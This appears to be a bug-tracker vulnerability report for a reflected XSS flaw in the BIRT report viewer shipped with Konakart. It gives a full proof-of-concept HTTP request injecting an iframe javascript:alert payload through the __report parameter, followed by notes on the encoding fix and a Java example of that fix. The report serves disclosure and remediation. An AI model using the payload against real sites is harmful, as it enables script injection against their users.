A Reflected XSS is present in the _report parameter: here below the modified request (that is the BIRT 2.2.1 version included in Konakart 2.2.6)

GET /birt-viewer/run?__report='"><iframe%20src=javascript:alert(666)>&r=-703171660 HTTP/1.1
Host: localhost:8780
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8780/konakartadmin/

Konakart is actually using org.eclipse.birt.core_2.2.1.r22x_v20070924, that is actually old I guess.
I don't have the time to try the exploit on newer versions, I leave this to you, even if I suppose that newer versions will be vulnerable too.

That said, I'm gonna publish it on my website http://antisnatchor.com as soon as you start to submit a patch.

Thanks
Michele Orru'
The exception stack trace is now also HTML-encoded.
verified on build 2.5.0 v20090309-0630.
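
The fix described in this report, sketched as an added example (not the BIRT viewer's own code): the class and method names are hypothetical, and it assumes the error page echoes the __report value through both the exception message and the stack trace, so both are HTML-encoded before being written.

```java
import java.io.PrintWriter;
import java.io.StringWriter;

// Added example: hypothetical names, not the BIRT viewer's own classes.
public class ErrorPageEncoding {

    // Encode the five characters that let a value break out of HTML text
    // or a quoted attribute.
    static String htmlEncode(String s) {
        if (s == null) return "";
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Build the error page: the message and the stack trace both carry
    // the request value, so both are encoded before being written.
    static String renderError(Throwable t) {
        StringWriter trace = new StringWriter();
        t.printStackTrace(new PrintWriter(trace, true));
        return "<div class=\"error\">" + htmlEncode(t.getMessage()) + "</div>\n"
             + "<pre>" + htmlEncode(trace.toString()) + "</pre>";
    }

    public static void main(String[] args) {
        // URL-decoded __report value from the request in this report.
        String report = "'\"><iframe src=javascript:alert(666)>";
        Exception e = new IllegalArgumentException("Cannot open report: " + report);
        String page = renderError(e);
        System.out.println(page);
        // The markup characters from the parameter survive only as entities.
        if (page.contains("<iframe")) throw new AssertionError("unencoded output");
    }
}
```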